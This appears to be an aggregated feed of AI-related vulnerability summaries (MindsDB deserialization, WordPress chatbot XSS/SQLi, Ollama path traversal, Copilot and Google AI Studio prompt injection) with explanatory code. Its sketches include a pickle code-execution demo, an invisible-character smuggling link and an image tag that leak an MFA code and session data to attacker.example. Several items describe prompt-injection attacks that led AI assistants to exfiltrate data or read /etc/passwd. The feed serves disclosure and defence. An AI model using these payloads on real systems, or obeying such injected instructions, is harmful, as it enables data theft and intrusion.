All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
CVE-2024-45854 is a vulnerability in MindsDB (a platform for building AI applications) versions 23.10.3.0 and newer where deserialization of untrusted data (converting data from an external format back into executable code without checking if it's safe) allows an attacker to upload a malicious model that runs arbitrary code (any commands the attacker wants) on the server when a describe query is executed on it.
CVE-2024-45853 is a vulnerability in MindsDB (a platform for building AI applications) versions 23.10.2.0 and newer where deserialization of untrusted data (the process of converting received data back into usable objects without checking if it's safe) allows an attacker to upload a malicious model that runs arbitrary code on the server when making predictions. This is a serious flaw because it gives attackers full control to execute whatever commands they want on the affected system.
CVE-2024-45852 is a vulnerability in MindsDB (a platform for building AI applications) versions 23.3.2.0 and newer that allows deserialization of untrusted data (converting untrusted incoming data back into executable code). An attacker can upload a malicious model that runs arbitrary code (any commands they choose) on the server when someone interacts with it.
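The danger in all three MindsDB items is generic to deserializing untrusted data in Python. A minimal, harmless sketch of the mechanism (illustrative only, not MindsDB's actual code): pickle will invoke whatever callable a crafted object's `__reduce__` returns, at load time, before the application sees anything.

```python
import pickle

class MaliciousModel:
    """Stand-in for an attacker-crafted 'model' artifact (illustrative only)."""
    def __reduce__(self):
        # pickle calls this callable with these args during loads(); a real
        # exploit would return something like (os.system, ("<shell cmd>",)).
        return (eval, ("6 * 7",))

payload = pickle.dumps(MaliciousModel())
print(pickle.loads(payload))  # 42 -- the expression ran during deserialization
```

This is why uploading a model file and later running a query against it is enough: the code executes the moment the server deserializes the artifact, with no further interaction needed.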
A security flaw was found in the Chatbot with ChatGPT WordPress plugin (versions before 2.4.5) where certain REST routes (endpoints that external programs use to interact with the plugin) did not properly check user permissions, allowing anyone without logging in to delete error and chat logs.
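The flaw class here is an endpoint registered without any permission callback. The plugin itself is PHP, but the pattern (and the fix) can be sketched in Python; the `manage_options` capability name is an assumption borrowed from WordPress conventions, not the plugin's actual code.

```python
# Illustrative sketch: a destructive route handler gated on an explicit
# capability check. The vulnerable version simply omitted the check, so
# anonymous callers succeeded.

def delete_chat_logs(user):
    if user is None or "manage_options" not in user.get("capabilities", ()):
        return {"status": 403, "error": "insufficient permissions"}
    # ... delete the error and chat logs here ...
    return {"status": 200}

print(delete_chat_logs(None)["status"])                                   # 403
print(delete_chat_logs({"capabilities": ("manage_options",)})["status"])  # 200
```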
A WordPress plugin called Chatbot Support AI (versions up to 1.0.2) has a security flaw where it fails to properly clean and filter certain settings, allowing admin users to inject malicious code through stored cross-site scripting (XSS, a type of attack where harmful scripts are saved and executed when users view a page). This vulnerability is particularly dangerous because it works even in multisite setups where HTML code is normally restricted.
Microsoft 365 Copilot has a vulnerability that allows attackers to steal personal information like emails and MFA codes through a multi-step attack. The exploit uses prompt injection (tricking an AI by hiding malicious instructions in emails or documents), automatic tool invocation (making Copilot search for additional sensitive data without user permission), and ASCII smuggling (hiding data in invisible characters within clickable links) to extract and exfiltrate personal information.
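The "ASCII smuggling" step can be sketched concretely: ASCII characters are mapped into the invisible Unicode Tags block (U+E0000 to U+E007F), so data appended to a clickable link renders as nothing while still round-tripping intact. A minimal sketch of the encoding, not the actual exploit:

```python
# Map ASCII into the invisible Unicode Tags block and back.

def smuggle(text: str) -> str:
    return "".join(chr(0xE0000 + ord(c)) for c in text)

def unsmuggle(hidden: str) -> str:
    return "".join(chr(ord(c) - 0xE0000) for c in hidden)

secret = "MFA code: 123456"
hidden = smuggle(secret)
# The hidden payload can ride inside a link the user is induced to click:
link = "https://attacker.example/" + hidden  # displays as a bare URL
print(len(hidden), unsmuggle(hidden))  # 16 MFA code: 123456
```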
CVE-2024-7110 is a vulnerability in GitLab EE (a code management platform) versions 17.0 through 17.3 that allows an attacker to execute arbitrary commands (run code of their choice) in a victim's pipeline through prompt injection (tricking the system by hiding malicious instructions in user input).
The European AI Act assigns the European Commission's AI Office various responsibilities for regulating AI systems, including promoting AI literacy, overseeing biometric identification systems used by law enforcement, managing a registry of certified testing bodies (notified bodies that verify AI safety), and investigating whether these bodies remain competent. Most of these oversight duties take effect starting February or August 2025, with no specific deadlines given for completing individual tasks.
The EU AI Act requires member states to receive and register notifications about high-risk AI systems (AI systems that pose significant risks to safety or rights) from various parties, including law enforcement agencies using facial recognition systems, AI providers, importers, and organizations deploying these systems. These responsibilities take effect in two phases: August 2, 2025, and August 2, 2026, with member states also needing to assess conformity assessment bodies (independent organizations that verify AI systems meet safety standards) and share documentation with the European Commission.
A researcher discovered a security flaw in Google AI Studio where prompt injection (tricking an AI by hiding instructions in its input) allowed data exfiltration (stealing data) through HTML image tags rendered by the system. The vulnerability worked because Google AI Studio lacked a Content Security Policy (a security rule that restricts where a webpage can load resources from), making it possible to send data to unauthorized servers.
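The exfiltration channel is simply an image URL: when the browser renders an attacker-supplied image tag, it fetches the URL, and anything embedded in that URL leaves with the request. A sketch of the payload shape and the CSP directive that would block it (the attacker domain and stolen value are made up for illustration):

```python
from urllib.parse import quote

# Attacker-injected markdown: rendering it makes the browser request the
# URL, leaking the query string to the attacker's server.
stolen = "session=abc123"
injected_markdown = f"![x](https://attacker.example/leak?d={quote(stolen)})"

# A Content-Security-Policy response header restricting image origins to the
# page's own origin would have prevented the browser from making that fetch:
csp_header = "Content-Security-Policy: img-src 'self'"

print(injected_markdown)
print(csp_header)
```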
Khoj, an application that creates personal AI agents, has a stored cross-site scripting (XSS) vulnerability in its Automation feature: because input is not properly sanitized, users can insert arbitrary HTML and JavaScript code through the q parameter of the /api/automation endpoint. The malicious code gets saved and runs when other users view the page.
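The standard fix for this class of bug is to escape user input before it is interpolated into HTML. A generic sketch (not Khoj's actual code) using Python's stdlib:

```python
import html

# Attacker-supplied value for the q parameter.
q = '<img src=x onerror=alert(1)>'

rendered_unsafe = f"<div>{q}</div>"             # script runs when viewed
rendered_safe = f"<div>{html.escape(q)}</div>"  # browser shows literal text

print(rendered_safe)
```

After escaping, the payload survives only as inert text (`&lt;img ...&gt;`), so nothing executes in the viewer's browser.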
The Chatbot with ChatGPT WordPress plugin before version 2.4.5 has a SQL injection vulnerability (a type of attack where malicious code is inserted into database queries), which can be exploited by anyone without needing to log in when they submit messages to the chatbot. The plugin fails to properly sanitize and escape a parameter, meaning it doesn't clean or protect user input before using it in a SQL statement.
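The vulnerable pattern and its standard fix can be sketched with sqlite3 (the plugin itself is PHP/MySQL, but the principle is identical): parameterized queries pass user input as data, never as SQL text.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE chat_log (message TEXT)")

user_input = "hi'); DROP TABLE chat_log; --"

# Vulnerable pattern: string concatenation splices attacker text into SQL.
#   query = "INSERT INTO chat_log VALUES ('" + user_input + "')"

# Fixed pattern: a parameterized query treats the input purely as data.
conn.execute("INSERT INTO chat_log VALUES (?)", (user_input,))

print(conn.execute("SELECT message FROM chat_log").fetchone()[0])
```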
The Chatbot with ChatGPT WordPress plugin before version 2.4.5 has a vulnerability where it does not properly clean and escape user inputs, allowing attackers to perform Stored Cross-Site Scripting attacks (XSS, a type of attack where malicious code gets saved and runs when admins view it) without needing to be logged in.
A division-by-zero bug occurs in the Linux kernel's memory management when evict_folios() (a function that removes memory pages) incorrectly reduces a counter called nr_scanned, causing it to underflow and become zero. This zero value is later used as a divisor in vmpressure_calc_level() (a function that measures memory pressure), crashing the system.
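The failure mode is plain arithmetic and can be modeled outside the kernel (the real code is C; this sketch only illustrates the zero divisor, and the guard shown is for illustration; the actual kernel fix removes the deduction instead, as noted in the fix below):

```python
def vmpressure_level(reclaimed: int, scanned: int) -> float:
    # Guard shown for illustration; the kernel fix instead ensures
    # 'scanned' never reaches zero in the first place.
    if scanned == 0:
        return 0.0
    return reclaimed / scanned

nr_scanned = 32
nr_scanned -= 32   # the bad deduction in evict_folios() zeroes the counter
print(vmpressure_level(8, nr_scanned))  # 0.0 instead of ZeroDivisionError
```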
Streamlit (a Python framework for building data applications) had a path traversal vulnerability (a flaw that lets attackers access files outside their intended directory) in its static file sharing feature on Windows. An attacker could exploit this to steal the password hash (an encrypted version of a password) of the Windows user running Streamlit.
CVE-2024-6706 is a vulnerability where attackers can write malicious prompts that trick a language model into running arbitrary JavaScript (code that executes in a web browser) on a webpage. This is a type of cross-site scripting (XSS) attack, where untrusted input is not properly cleaned before being displayed on a web page, allowing attackers to inject malicious code.
CVE-2024-38206 is a vulnerability in Microsoft Copilot Studio where an authenticated attacker (someone with valid login credentials) can bypass SSRF protection (security that prevents a server from being tricked into making unwanted network requests) to leak sensitive information over a network.
A vulnerability in the stitionai/devika AI project allows attackers to read sensitive files on a computer through prompt injection (tricking an AI by hiding malicious instructions in its input). The problem occurs because Google Gemini's safety filters were disabled, which normally prevent harmful outputs, leaving the system open to commands like reading `/etc/passwd` (a file containing user account information).
CVE-2024-38791 is a server-side request forgery (SSRF, a flaw where an attacker tricks a server into making unwanted requests to other systems) vulnerability in the Jordy Meow AI Engine: ChatGPT Chatbot plugin, affecting versions up to 2.4.7. Attackers can manipulate the plugin's server-side requests to reach targets of their choosing and perform unauthorized actions.
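A common SSRF mitigation, relevant to both this item and the Copilot Studio bypass above, is to reject request targets that resolve to internal address space. A generic sketch of that guard (not either product's actual code; note that hostname targets additionally need checking at DNS-resolution time):

```python
import ipaddress
from urllib.parse import urlparse

def is_safe_target(url: str) -> bool:
    """Refuse literal IPs in private, loopback, or link-local ranges."""
    host = urlparse(url).hostname
    if host is None:
        return False
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return True  # a hostname, not an IP literal; check after resolution
    return not (addr.is_private or addr.is_loopback or addr.is_link_local)

print(is_safe_target("http://169.254.169.254/latest/meta-data/"))  # False
print(is_safe_target("https://api.openai.com/v1/models"))          # True
```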
Fix: Update the Chatbot with ChatGPT WordPress plugin to version 2.4.5 or later.
Ollama before version 0.1.47 has a vulnerability in its extractFromZipFile function where it can extract files from a ZIP archive outside of the intended parent directory, a weakness called path traversal (CWE-22, where an attacker manipulates file paths to access directories they shouldn't). This could allow an attacker to write files to unintended locations on a system when processing a specially crafted ZIP file.
Fix: Update Ollama to version 0.1.47 or later. The fix is available in the comparison between v0.1.46 and v0.1.47 (https://github.com/ollama/ollama/compare/v0.1.46...v0.1.47) and was implemented in pull request #5314 (https://github.com/ollama/ollama/pull/5314).
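The check that this class of fix amounts to can be sketched in Python (Ollama itself is Go; this is the generic pattern): resolve each archive member path against the destination directory and refuse anything that escapes it.

```python
import os

def is_within(parent: str, member_name: str) -> bool:
    """True only if the archive member stays inside the parent directory."""
    parent = os.path.realpath(parent)
    target = os.path.realpath(os.path.join(parent, member_name))
    return os.path.commonpath([parent, target]) == parent

print(is_within("/tmp/models", "weights/layer0.bin"))  # True
print(is_within("/tmp/models", "../../etc/crontab"))   # False
```

An extractor would call this on every member name before writing, skipping or aborting on any entry that fails the check.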
Fix: This vulnerability is fixed in version 1.15.0.
Fix: Update the Chatbot with ChatGPT WordPress plugin to version 2.4.5 or later.
Fix: Stop deducting scan_control->nr_scanned in evict_folios(), as stated in the source: 'fix the problem by not deducting scan_control->nr_scanned in evict_folios()'. This prevents the counter from underflowing and eliminates the zero divisor.
Fix: The vulnerability was patched on Jul 25, 2024, as part of Streamlit open source version 1.37.0.
Fix: Patch available from Microsoft Corporation at https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38206